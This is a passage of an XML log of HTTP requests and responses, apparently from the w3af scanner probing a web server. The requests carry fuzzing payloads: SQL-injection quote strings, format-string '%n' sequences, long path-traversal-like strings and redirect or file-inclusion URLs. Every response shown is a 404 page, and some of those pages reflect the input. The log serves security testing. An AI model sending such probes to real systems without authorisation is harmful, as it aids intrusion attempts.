                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='d%27kc%22z%27gj%27%22%2A%2A5%2A%28%28%28%3B-%2A%60%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="312">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F%29%2F'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="313">
                <http-request>
                    <status>GET http://10.12.68.43:31337/a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='a%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/%29/'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="314">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="316">
                <http-request>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="317">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="319">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="320">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="557" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="322">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="325">
                <http-request>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="326">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="327">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="330">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="331">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="332">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="334">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="335">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="337">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="340">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
